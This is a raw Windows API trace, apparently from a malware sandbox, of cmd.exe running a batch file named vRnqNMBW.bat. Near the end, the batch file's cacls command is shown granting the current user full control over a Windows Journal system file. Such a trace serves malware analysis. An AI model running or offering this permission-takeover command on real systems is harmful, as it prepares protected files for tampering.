0x1b [0214.004] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0214.004] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.005] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0214.005] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0214.005] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0214.005] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0214.005] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0214.005] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0214.005] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0214.005] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0214.005] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0214.005] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0214.005] GetEnvironmentStringsW () returned 0x4380b8* [0214.005] FreeEnvironmentStringsA (penv="A") returned 1 [0214.005] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.005] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0214.005] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0214.005] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0214.005] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0214.005] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0214.005] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0214.005] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0214.005] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0214.005] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0214.005] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f5f4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0214.005] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x24f5f4, lpFilePart=0x24f5ec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x24f5ec*="Desktop") returned 0x1d [0214.005] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0214.006] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f370 | out: lpFindFileData=0x24f370) returned 0x4305c8 [0214.006] FindClose (in: hFindFile=0x4305c8 | out: hFindFile=0x4305c8) returned 1 [0214.006] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x24f370 | out: lpFindFileData=0x24f370) returned 0x4305c8 [0214.006] FindClose (in: hFindFile=0x4305c8 | out: hFindFile=0x4305c8) returned 1 [0214.006] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0214.006] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x24f370 | out: lpFindFileData=0x24f370) returned 0x4305c8 [0214.006] FindClose (in: hFindFile=0x4305c8 | out: hFindFile=0x4305c8) returned 1 [0214.006] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0214.006] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0214.006] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0214.006] GetEnvironmentStringsW () returned 0x4380b8* [0214.006] FreeEnvironmentStringsA (penv="=") returned 1 [0214.006] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0214.008] GetConsoleOutputCP () returned 0x1b5 [0214.008] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0214.008] GetUserDefaultLCID () returned 0x409 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f724, cchData=128 | out: lpLCData="0") returned 2 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f724, cchData=128 | out: lpLCData="0") returned 2 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f724, cchData=128 | out: lpLCData="1") returned 2 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0214.009] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0214.009] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0214.010] GetConsoleTitleW (in: lpConsoleTitle=0x43a9a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.011] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0214.011] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0214.011] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0214.011] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0214.012] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0214.012] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0214.012] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0214.012] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0214.012] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0214.012] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0214.012] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0214.013] GetConsoleTitleW (in: lpConsoleTitle=0x24f410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.014] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0214.014] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0214.014] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0214.014] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0214.014] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0214.014] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0214.014] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0214.014] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0214.014] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0214.014] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0214.014] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0214.014] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0214.014] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0214.014] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0214.014] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0214.014] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0214.014] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0214.014] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0214.014] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0214.014] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0214.014] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0214.014] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0214.014] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0214.014] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0214.014] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0214.014] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0214.014] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0214.014] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0214.014] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0214.014] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0214.014] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0214.014] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0214.014] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0214.014] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0214.014] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0214.015] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0214.015] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0214.015] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0214.015] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0214.015] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0214.015] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0214.015] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0214.015] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0214.015] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0214.015] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0214.015] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0214.015] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0214.015] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0214.015] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0214.015] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0214.015] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0214.015] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0214.015] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0214.015] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0214.015] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0214.015] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0214.015] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0214.015] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0214.015] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0214.015] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0214.015] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0214.015] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0214.015] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0214.015] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0214.015] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0214.015] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0214.015] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0214.015] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0214.015] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0214.015] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0214.015] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0214.015] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0214.015] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0214.015] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0214.015] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0214.015] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0214.015] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0214.015] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0214.015] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0214.015] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0214.015] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0214.015] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0214.015] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0214.015] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0214.015] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0214.015] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0214.015] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0214.015] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0214.016] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0214.016] SetErrorMode (uMode=0x0) returned 0x0 [0214.016] SetErrorMode (uMode=0x1) returned 0x0 [0214.016] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x4305d0, lpFilePart=0x24ef1c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x24ef1c*="Desktop") returned 0x1d [0214.016] SetErrorMode (uMode=0x0) returned 0x1 [0214.016] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0214.016] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.019] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.019] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0x24ecc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ecc8) returned 0x43b140 [0214.019] FindClose (in: hFindFile=0x43b140 | out: hFindFile=0x43b140) returned 1 [0214.019] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0214.019] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0214.019] GetConsoleTitleW (in: lpConsoleTitle=0x24f19c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.019] ApiSetQueryApiSetPresence () returned 0x0 [0214.019] ResolveDelayLoadedAPI () returned 0x745414a0 [0214.021] SaferWorker () returned 0x0 [0214.033] SetErrorMode (uMode=0x0) returned 0x0 [0214.033] SetErrorMode (uMode=0x1) returned 0x0 [0214.033] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0x43ad20, lpFilePart=0x24f04c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x24f04c*="vRnqNMBW.bat") returned 0x2a [0214.033] SetErrorMode (uMode=0x0) returned 0x1 [0214.033] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"", _Control=" \x09") returned 0x1 [0214.033] CmdBatNotificationStub () returned 0x1 [0214.033] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f0dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0214.033] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0214.033] _get_osfhandle (_FileHandle=3) returned 0xb4 [0214.033] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0214.033] _get_osfhandle (_FileHandle=3) returned 0xb4 [0214.033] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0214.034] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f0ac, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x24f0ac*=0xe2, lpOverlapped=0x0) returned 1 [0214.034] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0214.034] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0214.035] _get_osfhandle (_FileHandle=3) returned 0xb4 [0214.035] GetFileType (hFile=0xb4) returned 0x1 [0214.035] _get_osfhandle (_FileHandle=3) returned 0xb4 [0214.035] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0214.035] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0214.035] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0214.035] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0214.035] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0214.035] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0214.035] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0214.035] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0214.035] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0214.037] _tell (_FileHandle=3) returned 32 [0214.037] _close (_FileHandle=3) returned 0 [0214.037] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24ee70 | out: _Buffer="\r\n") returned 2 [0214.037] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.037] GetFileType (hFile=0x3c) returned 0x2 [0214.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0214.037] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee48 | out: lpMode=0x24ee48) returned 1 [0214.038] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.038] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24ee60, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24ee60*=0x2) returned 1 [0214.038] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0214.038] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0214.038] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24ee6c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0214.038] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x24ee6c | out: _Buffer=">") returned 1 [0214.038] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.038] GetFileType (hFile=0x3c) returned 0x2 [0214.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0214.038] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee4c | out: lpMode=0x24ee4c) returned 1 [0214.039] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.039] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24ee64, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x24ee64*=0x1e) returned 1 [0214.039] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.039] GetFileType (hFile=0x3c) returned 0x2 [0214.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0214.039] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0ec | out: lpMode=0x24f0ec) returned 1 [0214.039] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.039] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x4379b0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x24f104, lpReserved=0x0 | out: lpBuffer=0x4379b0*, lpNumberOfCharsWritten=0x24f104*=0x5) returned 1 [0214.040] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f10c | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\" /E /G CIiHmnxMn6Ps:F /C ") returned 81 [0214.040] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.040] GetFileType (hFile=0x3c) returned 0x2 [0214.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0214.040] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e4 | out: lpMode=0x24f0e4) returned 1 [0214.040] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.040] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x51, lpNumberOfCharsWritten=0x24f0fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0fc*=0x51) returned 1 [0214.040] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f120 | out: _Buffer="\r\n") returned 2 [0214.040] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.040] GetFileType (hFile=0x3c) returned 0x2 [0214.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0214.040] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0f8 | out: lpMode=0x24f0f8) returned 1 [0214.041] _get_osfhandle (_FileHandle=1) returned 0x3c [0214.041] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f110, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f110*=0x2) returned 1 [0214.041] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0214.041] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0214.041] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0214.041] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0214.041] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0214.041] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0214.041] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0214.041] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0214.041] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0214.041] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0214.041] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0214.041] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0214.041] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0214.041] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0214.041] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0214.041] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0214.041] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0214.041] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0214.041] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0214.041] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0214.041] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0214.041] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0214.041] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0214.041] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0214.041] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0214.041] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0214.041] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0214.041] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0214.041] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0214.041] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0214.041] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0214.041] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0214.041] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0214.041] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0214.041] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0214.041] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0214.041] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0214.041] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0214.042] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0214.042] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0214.042] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0214.042] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0214.042] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0214.042] SetErrorMode (uMode=0x0) returned 0x0 [0214.042] SetErrorMode (uMode=0x1) returned 0x0 [0214.042] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x43be90, lpFilePart=0x24eebc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x24eebc*="Desktop") returned 0x1d [0214.042] SetErrorMode (uMode=0x0) returned 0x1 [0214.042] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0214.042] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.044] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.044] GetDriveTypeW (lpRootPathName="C:\\") returned 